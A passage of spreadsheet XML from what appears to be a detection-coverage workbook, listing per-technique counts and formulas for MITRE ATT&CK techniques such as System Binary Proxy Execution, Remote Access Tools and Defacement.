      <c r="R42" s="394">
        <v>3</v>
      </c>
      <c r="S42" s="292">
        <v>30</v>
      </c>
      <c r="T42" s="322">
        <v>12</v>
      </c>
      <c r="U42" s="322" t="str">
        <f t="shared" si="2"/>
        <v>12 (30)</v>
      </c>
      <c r="V42" s="12">
        <v>9</v>
      </c>
      <c r="W42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="X42" s="394">
        <v>4</v>
      </c>
      <c r="Y42" s="392">
        <v>26256</v>
      </c>
      <c r="Z42" s="392">
        <v>790</v>
      </c>
      <c r="AA42" s="322" t="str">
        <f t="shared" si="3"/>
        <v>790 (26256)</v>
      </c>
      <c r="AB42" s="392">
        <v>15</v>
      </c>
      <c r="AC42" s="16">
        <v>1</v>
      </c>
      <c r="AD42" s="394">
        <v>264</v>
      </c>
      <c r="AE42" s="392">
        <v>6590</v>
      </c>
      <c r="AF42" s="392">
        <v>292</v>
      </c>
      <c r="AG42" s="322" t="str">
        <f t="shared" si="4"/>
        <v>292 (6590)</v>
      </c>
      <c r="AH42" s="392">
        <v>12</v>
      </c>
      <c r="AI42" s="16">
        <v>1</v>
      </c>
      <c r="AJ42" s="394">
        <v>261</v>
      </c>
      <c r="AK42" s="392">
        <v>32846</v>
      </c>
      <c r="AL42" s="392">
        <v>1082</v>
      </c>
      <c r="AM42" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1082 (32846)</v>
      </c>
      <c r="AN42" s="392">
        <v>27</v>
      </c>
      <c r="AO42" s="16">
        <v>1</v>
      </c>
      <c r="AP42" s="394">
        <v>264</v>
      </c>
      <c r="AQ42" s="292">
        <v>16</v>
      </c>
      <c r="AR42" s="322">
        <v>2</v>
      </c>
      <c r="AS42" s="322" t="str">
        <f t="shared" si="6"/>
        <v>2 (16)</v>
      </c>
      <c r="AT42" s="12">
        <v>2</v>
      </c>
      <c r="AU42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="AV42" s="394">
        <v>1</v>
      </c>
      <c r="AW42" s="392">
        <v>29</v>
      </c>
      <c r="AX42" s="392">
        <v>3</v>
      </c>
      <c r="AY42" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (29)</v>
      </c>
      <c r="AZ42" s="4">
        <v>3</v>
      </c>
      <c r="BA42" s="16">
        <v>0.33333333333333331</v>
      </c>
      <c r="BB42" s="394">
        <v>1</v>
      </c>
      <c r="BC42" s="292">
        <v>43</v>
      </c>
      <c r="BD42" s="322">
        <v>13</v>
      </c>
      <c r="BE42" s="322" t="str">
        <f t="shared" si="8"/>
        <v>13 (43)</v>
      </c>
      <c r="BF42" s="12">
        <v>10</v>
      </c>
      <c r="BG42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BH42" s="394">
        <v>4</v>
      </c>
      <c r="BI42" s="292">
        <v>7</v>
      </c>
      <c r="BJ42" s="322">
        <v>5</v>
      </c>
      <c r="BK42" s="322" t="str">
        <f t="shared" si="9"/>
        <v>5 (7)</v>
      </c>
      <c r="BL42" s="12">
        <v>5</v>
      </c>
      <c r="BM42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN42" s="394">
        <v>4</v>
      </c>
      <c r="BO42" s="292">
        <v>551</v>
      </c>
      <c r="BP42" s="322">
        <v>549</v>
      </c>
      <c r="BQ42" s="322" t="str">
        <f t="shared" si="10"/>
        <v>549 (551)</v>
      </c>
      <c r="BR42" s="12">
        <v>5</v>
      </c>
      <c r="BS42" s="12">
        <v>7</v>
      </c>
      <c r="BT42" s="13">
        <v>1</v>
      </c>
      <c r="BU42" s="394">
        <v>283</v>
      </c>
      <c r="BV42" s="292">
        <v>4</v>
      </c>
      <c r="BW42" s="322">
        <v>3</v>
      </c>
      <c r="BX42" s="322" t="str">
        <f t="shared" si="11"/>
        <v>3 (4)</v>
      </c>
      <c r="BY42" s="12">
        <v>3</v>
      </c>
      <c r="BZ42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CA42" s="394">
        <v>3</v>
      </c>
      <c r="CB42" s="292">
        <v>12930</v>
      </c>
      <c r="CC42" s="322">
        <v>261</v>
      </c>
      <c r="CD42" s="322" t="str">
        <f t="shared" si="12"/>
        <v>261 (12930)</v>
      </c>
      <c r="CE42" s="12">
        <v>0</v>
      </c>
      <c r="CF42" s="12">
        <v>3</v>
      </c>
      <c r="CG42" s="13">
        <v>1</v>
      </c>
      <c r="CH42" s="394">
        <v>261</v>
      </c>
    </row>
    <row r="43" spans="1:86" ht="15" customHeight="1">
      <c r="A43" s="4">
        <f t="shared" si="13"/>
        <v>41</v>
      </c>
      <c r="B43" s="4" t="str">
        <f>IFERROR(VLOOKUP(A43,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1218</v>
      </c>
      <c r="C43" s="493" t="str">
        <f>IFERROR(VLOOKUP(B43,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Binary Proxy Execution</v>
      </c>
      <c r="D43" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B43)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E43" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F43" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G43" s="292">
        <v>0</v>
      </c>
      <c r="H43" s="322">
        <v>0</v>
      </c>
      <c r="I43" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J43" s="12">
        <v>0</v>
      </c>
      <c r="K43" s="13">
        <v>0</v>
      </c>
      <c r="L43" s="394">
        <v>0</v>
      </c>
      <c r="M43" s="322">
        <v>0</v>
      </c>
      <c r="N43" s="322">
        <v>0</v>
      </c>
      <c r="O43" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P43" s="12">
        <v>0</v>
      </c>
      <c r="Q43" s="13">
        <v>0</v>
      </c>
      <c r="R43" s="394">
        <v>0</v>
      </c>
      <c r="S43" s="292">
        <v>0</v>
      </c>
      <c r="T43" s="322">
        <v>0</v>
      </c>
      <c r="U43" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V43" s="12">
        <v>0</v>
      </c>
      <c r="W43" s="13">
        <v>0</v>
      </c>
      <c r="X43" s="394">
        <v>0</v>
      </c>
      <c r="Y43" s="392">
        <v>0</v>
      </c>
      <c r="Z43" s="392">
        <v>0</v>
      </c>
      <c r="AA43" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB43" s="392">
        <v>0</v>
      </c>
      <c r="AC43" s="16">
        <v>0</v>
      </c>
      <c r="AD43" s="394">
        <v>0</v>
      </c>
      <c r="AE43" s="392">
        <v>2</v>
      </c>
      <c r="AF43" s="392">
        <v>2</v>
      </c>
      <c r="AG43" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (2)</v>
      </c>
      <c r="AH43" s="392">
        <v>1</v>
      </c>
      <c r="AI43" s="16">
        <v>1</v>
      </c>
      <c r="AJ43" s="394">
        <v>2</v>
      </c>
      <c r="AK43" s="392">
        <v>2</v>
      </c>
      <c r="AL43" s="392">
        <v>2</v>
      </c>
      <c r="AM43" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (2)</v>
      </c>
      <c r="AN43" s="392">
        <v>1</v>
      </c>
      <c r="AO43" s="16">
        <v>1</v>
      </c>
      <c r="AP43" s="394">
        <v>2</v>
      </c>
      <c r="AQ43" s="292">
        <v>0</v>
      </c>
      <c r="AR43" s="322">
        <v>0</v>
      </c>
      <c r="AS43" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT43" s="12">
        <v>0</v>
      </c>
      <c r="AU43" s="13">
        <v>0</v>
      </c>
      <c r="AV43" s="394">
        <v>0</v>
      </c>
      <c r="AW43" s="392">
        <v>0</v>
      </c>
      <c r="AX43" s="392">
        <v>0</v>
      </c>
      <c r="AY43" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ43" s="4">
        <v>0</v>
      </c>
      <c r="BA43" s="16">
        <v>0</v>
      </c>
      <c r="BB43" s="394">
        <v>0</v>
      </c>
      <c r="BC43" s="292">
        <v>0</v>
      </c>
      <c r="BD43" s="322">
        <v>0</v>
      </c>
      <c r="BE43" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF43" s="12">
        <v>0</v>
      </c>
      <c r="BG43" s="13">
        <v>0</v>
      </c>
      <c r="BH43" s="394">
        <v>0</v>
      </c>
      <c r="BI43" s="292">
        <v>0</v>
      </c>
      <c r="BJ43" s="322">
        <v>0</v>
      </c>
      <c r="BK43" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL43" s="12">
        <v>0</v>
      </c>
      <c r="BM43" s="13">
        <v>0</v>
      </c>
      <c r="BN43" s="394">
        <v>0</v>
      </c>
      <c r="BO43" s="292">
        <v>2</v>
      </c>
      <c r="BP43" s="322">
        <v>2</v>
      </c>
      <c r="BQ43" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR43" s="12">
        <v>0</v>
      </c>
      <c r="BS43" s="12">
        <v>2</v>
      </c>
      <c r="BT43" s="13">
        <v>1</v>
      </c>
      <c r="BU43" s="394">
        <v>2</v>
      </c>
      <c r="BV43" s="292">
        <v>0</v>
      </c>
      <c r="BW43" s="322">
        <v>0</v>
      </c>
      <c r="BX43" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY43" s="12">
        <v>0</v>
      </c>
      <c r="BZ43" s="13">
        <v>0</v>
      </c>
      <c r="CA43" s="394">
        <v>0</v>
      </c>
      <c r="CB43" s="292">
        <v>1</v>
      </c>
      <c r="CC43" s="322">
        <v>1</v>
      </c>
      <c r="CD43" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE43" s="12">
        <v>0</v>
      </c>
      <c r="CF43" s="12">
        <v>1</v>
      </c>
      <c r="CG43" s="13">
        <v>1</v>
      </c>
      <c r="CH43" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:86" ht="15" customHeight="1">
      <c r="A44" s="4">
        <f t="shared" si="13"/>
        <v>42</v>
      </c>
      <c r="B44" s="4" t="str">
        <f>IFERROR(VLOOKUP(A44,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1219</v>
      </c>
      <c r="C44" s="493" t="str">
        <f>IFERROR(VLOOKUP(B44,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Access Tools</v>
      </c>
      <c r="D44" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B44)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E44" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>147</v>
      </c>
      <c r="F44" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (147)</v>
      </c>
      <c r="G44" s="292">
        <v>39</v>
      </c>
      <c r="H44" s="322">
        <v>8</v>
      </c>
      <c r="I44" s="322" t="str">
        <f t="shared" si="0"/>
        <v>8 (39)</v>
      </c>
      <c r="J44" s="12">
        <v>2</v>
      </c>
      <c r="K44" s="13">
        <v>0.5</v>
      </c>
      <c r="L44" s="394">
        <v>8</v>
      </c>
      <c r="M44" s="322">
        <v>0</v>
      </c>
      <c r="N44" s="322">
        <v>0</v>
      </c>
      <c r="O44" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P44" s="12">
        <v>0</v>
      </c>
      <c r="Q44" s="13">
        <v>0</v>
      </c>
      <c r="R44" s="394">
        <v>0</v>
      </c>
      <c r="S44" s="292">
        <v>39</v>
      </c>
      <c r="T44" s="322">
        <v>8</v>
      </c>
      <c r="U44" s="322" t="str">
        <f t="shared" si="2"/>
        <v>8 (39)</v>
      </c>
      <c r="V44" s="12">
        <v>2</v>
      </c>
      <c r="W44" s="13">
        <v>0.5</v>
      </c>
      <c r="X44" s="394">
        <v>8</v>
      </c>
      <c r="Y44" s="392">
        <v>84</v>
      </c>
      <c r="Z44" s="392">
        <v>39</v>
      </c>
      <c r="AA44" s="322" t="str">
        <f t="shared" si="3"/>
        <v>39 (84)</v>
      </c>
      <c r="AB44" s="392">
        <v>7</v>
      </c>
      <c r="AC44" s="16">
        <v>0.5</v>
      </c>
      <c r="AD44" s="394">
        <v>37</v>
      </c>
      <c r="AE44" s="392">
        <v>32</v>
      </c>
      <c r="AF44" s="392">
        <v>32</v>
      </c>
      <c r="AG44" s="322" t="str">
        <f t="shared" si="4"/>
        <v>32 (32)</v>
      </c>
      <c r="AH44" s="392">
        <v>2</v>
      </c>
      <c r="AI44" s="16">
        <v>1</v>
      </c>
      <c r="AJ44" s="394">
        <v>29</v>
      </c>
      <c r="AK44" s="392">
        <v>116</v>
      </c>
      <c r="AL44" s="392">
        <v>71</v>
      </c>
      <c r="AM44" s="322" t="str">
        <f t="shared" si="5"/>
        <v>71 (116)</v>
      </c>
      <c r="AN44" s="392">
        <v>9</v>
      </c>
      <c r="AO44" s="16">
        <v>1</v>
      </c>
      <c r="AP44" s="394">
        <v>60</v>
      </c>
      <c r="AQ44" s="292">
        <v>0</v>
      </c>
      <c r="AR44" s="322">
        <v>0</v>
      </c>
      <c r="AS44" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT44" s="12">
        <v>0</v>
      </c>
      <c r="AU44" s="13">
        <v>0</v>
      </c>
      <c r="AV44" s="394">
        <v>0</v>
      </c>
      <c r="AW44" s="392">
        <v>1</v>
      </c>
      <c r="AX44" s="392">
        <v>1</v>
      </c>
      <c r="AY44" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ44" s="4">
        <v>1</v>
      </c>
      <c r="BA44" s="16">
        <v>0.5</v>
      </c>
      <c r="BB44" s="394">
        <v>1</v>
      </c>
      <c r="BC44" s="292">
        <v>40</v>
      </c>
      <c r="BD44" s="322">
        <v>9</v>
      </c>
      <c r="BE44" s="322" t="str">
        <f t="shared" si="8"/>
        <v>9 (40)</v>
      </c>
      <c r="BF44" s="12">
        <v>3</v>
      </c>
      <c r="BG44" s="13">
        <v>0.5</v>
      </c>
      <c r="BH44" s="394">
        <v>9</v>
      </c>
      <c r="BI44" s="292">
        <v>3</v>
      </c>
      <c r="BJ44" s="322">
        <v>2</v>
      </c>
      <c r="BK44" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL44" s="12">
        <v>1</v>
      </c>
      <c r="BM44" s="13">
        <v>0.5</v>
      </c>
      <c r="BN44" s="394">
        <v>2</v>
      </c>
      <c r="BO44" s="292">
        <v>135</v>
      </c>
      <c r="BP44" s="322">
        <v>134</v>
      </c>
      <c r="BQ44" s="322" t="str">
        <f t="shared" si="10"/>
        <v>134 (135)</v>
      </c>
      <c r="BR44" s="12">
        <v>1</v>
      </c>
      <c r="BS44" s="12">
        <v>5</v>
      </c>
      <c r="BT44" s="13">
        <v>1</v>
      </c>
      <c r="BU44" s="394">
        <v>132</v>
      </c>
      <c r="BV44" s="292">
        <v>0</v>
      </c>
      <c r="BW44" s="322">
        <v>0</v>
      </c>
      <c r="BX44" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY44" s="12">
        <v>0</v>
      </c>
      <c r="BZ44" s="13">
        <v>0</v>
      </c>
      <c r="CA44" s="394">
        <v>0</v>
      </c>
      <c r="CB44" s="292">
        <v>0</v>
      </c>
      <c r="CC44" s="322">
        <v>0</v>
      </c>
      <c r="CD44" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE44" s="12">
        <v>0</v>
      </c>
      <c r="CF44" s="12">
        <v>0</v>
      </c>
      <c r="CG44" s="13">
        <v>0</v>
      </c>
      <c r="CH44" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:86" ht="15" customHeight="1">
      <c r="A45" s="4">
        <f t="shared" si="13"/>
        <v>43</v>
      </c>
      <c r="B45" s="4" t="str">
        <f>IFERROR(VLOOKUP(A45,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1221</v>
      </c>
      <c r="C45" s="493" t="str">
        <f>IFERROR(VLOOKUP(B45,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Template Injection</v>
      </c>
      <c r="D45" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B45)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E45" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>16</v>
      </c>
      <c r="F45" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (16)</v>
      </c>
      <c r="G45" s="292">
        <v>1</v>
      </c>
      <c r="H45" s="322">
        <v>1</v>
      </c>
      <c r="I45" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J45" s="12">
        <v>1</v>
      </c>
      <c r="K45" s="13">
        <v>1</v>
      </c>
      <c r="L45" s="394">
        <v>1</v>
      </c>
      <c r="M45" s="322">
        <v>3</v>
      </c>
      <c r="N45" s="322">
        <v>3</v>
      </c>
      <c r="O45" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P45" s="12">
        <v>3</v>
      </c>
      <c r="Q45" s="13">
        <v>1</v>
      </c>
      <c r="R45" s="394">
        <v>3</v>
      </c>
      <c r="S45" s="292">
        <v>4</v>
      </c>
      <c r="T45" s="322">
        <v>4</v>
      </c>
      <c r="U45" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (4)</v>
      </c>
      <c r="V45" s="12">
        <v>4</v>
      </c>
      <c r="W45" s="13">
        <v>1</v>
      </c>
      <c r="X45" s="394">
        <v>3</v>
      </c>
      <c r="Y45" s="392">
        <v>8</v>
      </c>
      <c r="Z45" s="392">
        <v>8</v>
      </c>
      <c r="AA45" s="322" t="str">
        <f t="shared" si="3"/>
        <v>8 (8)</v>
      </c>
      <c r="AB45" s="392">
        <v>3</v>
      </c>
      <c r="AC45" s="16">
        <v>1</v>
      </c>
      <c r="AD45" s="394">
        <v>7</v>
      </c>
      <c r="AE45" s="392">
        <v>14</v>
      </c>
      <c r="AF45" s="392">
        <v>10</v>
      </c>
      <c r="AG45" s="322" t="str">
        <f t="shared" si="4"/>
        <v>10 (14)</v>
      </c>
      <c r="AH45" s="392">
        <v>8</v>
      </c>
      <c r="AI45" s="16">
        <v>1</v>
      </c>
      <c r="AJ45" s="394">
        <v>5</v>
      </c>
      <c r="AK45" s="392">
        <v>22</v>
      </c>
      <c r="AL45" s="392">
        <v>18</v>
      </c>
      <c r="AM45" s="322" t="str">
        <f t="shared" si="5"/>
        <v>18 (22)</v>
      </c>
      <c r="AN45" s="392">
        <v>11</v>
      </c>
      <c r="AO45" s="16">
        <v>1</v>
      </c>
      <c r="AP45" s="394">
        <v>8</v>
      </c>
      <c r="AQ45" s="292">
        <v>0</v>
      </c>
      <c r="AR45" s="322">
        <v>0</v>
      </c>
      <c r="AS45" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT45" s="12">
        <v>0</v>
      </c>
      <c r="AU45" s="13">
        <v>0</v>
      </c>
      <c r="AV45" s="394">
        <v>0</v>
      </c>
      <c r="AW45" s="392">
        <v>0</v>
      </c>
      <c r="AX45" s="392">
        <v>0</v>
      </c>
      <c r="AY45" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ45" s="4">
        <v>0</v>
      </c>
      <c r="BA45" s="16">
        <v>0</v>
      </c>
      <c r="BB45" s="394">
        <v>0</v>
      </c>
      <c r="BC45" s="292">
        <v>4</v>
      </c>
      <c r="BD45" s="322">
        <v>4</v>
      </c>
      <c r="BE45" s="322" t="str">
        <f t="shared" si="8"/>
        <v>4 (4)</v>
      </c>
      <c r="BF45" s="12">
        <v>4</v>
      </c>
      <c r="BG45" s="13">
        <v>1</v>
      </c>
      <c r="BH45" s="394">
        <v>3</v>
      </c>
      <c r="BI45" s="292">
        <v>2</v>
      </c>
      <c r="BJ45" s="322">
        <v>1</v>
      </c>
      <c r="BK45" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL45" s="12">
        <v>1</v>
      </c>
      <c r="BM45" s="13">
        <v>1</v>
      </c>
      <c r="BN45" s="394">
        <v>1</v>
      </c>
      <c r="BO45" s="292">
        <v>14</v>
      </c>
      <c r="BP45" s="322">
        <v>11</v>
      </c>
      <c r="BQ45" s="322" t="str">
        <f t="shared" si="10"/>
        <v>11 (14)</v>
      </c>
      <c r="BR45" s="12">
        <v>1</v>
      </c>
      <c r="BS45" s="12">
        <v>6</v>
      </c>
      <c r="BT45" s="13">
        <v>1</v>
      </c>
      <c r="BU45" s="394">
        <v>11</v>
      </c>
      <c r="BV45" s="292">
        <v>0</v>
      </c>
      <c r="BW45" s="322">
        <v>0</v>
      </c>
      <c r="BX45" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY45" s="12">
        <v>0</v>
      </c>
      <c r="BZ45" s="13">
        <v>0</v>
      </c>
      <c r="CA45" s="394">
        <v>0</v>
      </c>
      <c r="CB45" s="292">
        <v>6</v>
      </c>
      <c r="CC45" s="322">
        <v>6</v>
      </c>
      <c r="CD45" s="322" t="str">
        <f t="shared" si="12"/>
        <v>6 (6)</v>
      </c>
      <c r="CE45" s="12">
        <v>0</v>
      </c>
      <c r="CF45" s="12">
        <v>1</v>
      </c>
      <c r="CG45" s="13">
        <v>1</v>
      </c>
      <c r="CH45" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="46" spans="1:86" ht="15" customHeight="1">
      <c r="A46" s="4">
        <f t="shared" si="13"/>
        <v>44</v>
      </c>
      <c r="B46" s="4" t="str">
        <f>IFERROR(VLOOKUP(A46,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1482</v>
      </c>
      <c r="C46" s="493" t="str">
        <f>IFERROR(VLOOKUP(B46,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="D46" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B46)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E46" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>4</v>
      </c>
      <c r="F46" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (4)</v>
      </c>
      <c r="G46" s="292">
        <v>0</v>
      </c>
      <c r="H46" s="322">
        <v>0</v>
      </c>
      <c r="I46" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J46" s="12">
        <v>0</v>
      </c>
      <c r="K46" s="13">
        <v>0</v>
      </c>
      <c r="L46" s="394">
        <v>0</v>
      </c>
      <c r="M46" s="322">
        <v>0</v>
      </c>
      <c r="N46" s="322">
        <v>0</v>
      </c>
      <c r="O46" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P46" s="12">
        <v>0</v>
      </c>
      <c r="Q46" s="13">
        <v>0</v>
      </c>
      <c r="R46" s="394">
        <v>0</v>
      </c>
      <c r="S46" s="292">
        <v>0</v>
      </c>
      <c r="T46" s="322">
        <v>0</v>
      </c>
      <c r="U46" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V46" s="12">
        <v>0</v>
      </c>
      <c r="W46" s="13">
        <v>0</v>
      </c>
      <c r="X46" s="394">
        <v>0</v>
      </c>
      <c r="Y46" s="392">
        <v>3</v>
      </c>
      <c r="Z46" s="392">
        <v>2</v>
      </c>
      <c r="AA46" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (3)</v>
      </c>
      <c r="AB46" s="392">
        <v>1</v>
      </c>
      <c r="AC46" s="16">
        <v>1</v>
      </c>
      <c r="AD46" s="394">
        <v>2</v>
      </c>
      <c r="AE46" s="392">
        <v>4</v>
      </c>
      <c r="AF46" s="392">
        <v>2</v>
      </c>
      <c r="AG46" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH46" s="392">
        <v>2</v>
      </c>
      <c r="AI46" s="16">
        <v>1</v>
      </c>
      <c r="AJ46" s="394">
        <v>1</v>
      </c>
      <c r="AK46" s="392">
        <v>7</v>
      </c>
      <c r="AL46" s="392">
        <v>4</v>
      </c>
      <c r="AM46" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (7)</v>
      </c>
      <c r="AN46" s="392">
        <v>3</v>
      </c>
      <c r="AO46" s="16">
        <v>1</v>
      </c>
      <c r="AP46" s="394">
        <v>2</v>
      </c>
      <c r="AQ46" s="292">
        <v>0</v>
      </c>
      <c r="AR46" s="322">
        <v>0</v>
      </c>
      <c r="AS46" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT46" s="12">
        <v>0</v>
      </c>
      <c r="AU46" s="13">
        <v>0</v>
      </c>
      <c r="AV46" s="394">
        <v>0</v>
      </c>
      <c r="AW46" s="392">
        <v>0</v>
      </c>
      <c r="AX46" s="392">
        <v>0</v>
      </c>
      <c r="AY46" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ46" s="4">
        <v>0</v>
      </c>
      <c r="BA46" s="16">
        <v>0</v>
      </c>
      <c r="BB46" s="394">
        <v>0</v>
      </c>
      <c r="BC46" s="292">
        <v>0</v>
      </c>
      <c r="BD46" s="322">
        <v>0</v>
      </c>
      <c r="BE46" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF46" s="12">
        <v>0</v>
      </c>
      <c r="BG46" s="13">
        <v>0</v>
      </c>
      <c r="BH46" s="394">
        <v>0</v>
      </c>
      <c r="BI46" s="292">
        <v>0</v>
      </c>
      <c r="BJ46" s="322">
        <v>0</v>
      </c>
      <c r="BK46" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL46" s="12">
        <v>0</v>
      </c>
      <c r="BM46" s="13">
        <v>0</v>
      </c>
      <c r="BN46" s="394">
        <v>0</v>
      </c>
      <c r="BO46" s="292">
        <v>2</v>
      </c>
      <c r="BP46" s="322">
        <v>2</v>
      </c>
      <c r="BQ46" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR46" s="12">
        <v>0</v>
      </c>
      <c r="BS46" s="12">
        <v>2</v>
      </c>
      <c r="BT46" s="13">
        <v>1</v>
      </c>
      <c r="BU46" s="394">
        <v>2</v>
      </c>
      <c r="BV46" s="292">
        <v>0</v>
      </c>
      <c r="BW46" s="322">
        <v>0</v>
      </c>
      <c r="BX46" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY46" s="12">
        <v>0</v>
      </c>
      <c r="BZ46" s="13">
        <v>0</v>
      </c>
      <c r="CA46" s="394">
        <v>0</v>
      </c>
      <c r="CB46" s="292">
        <v>0</v>
      </c>
      <c r="CC46" s="322">
        <v>0</v>
      </c>
      <c r="CD46" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE46" s="12">
        <v>0</v>
      </c>
      <c r="CF46" s="12">
        <v>0</v>
      </c>
      <c r="CG46" s="13">
        <v>0</v>
      </c>
      <c r="CH46" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:86" ht="15" customHeight="1">
      <c r="A47" s="4">
        <f t="shared" si="13"/>
        <v>45</v>
      </c>
      <c r="B47" s="4" t="str">
        <f>IFERROR(VLOOKUP(A47,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1491</v>
      </c>
      <c r="C47" s="493" t="str">
        <f>IFERROR(VLOOKUP(B47,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Defacement</v>
      </c>
      <c r="D47" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B47)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E47" s="493">
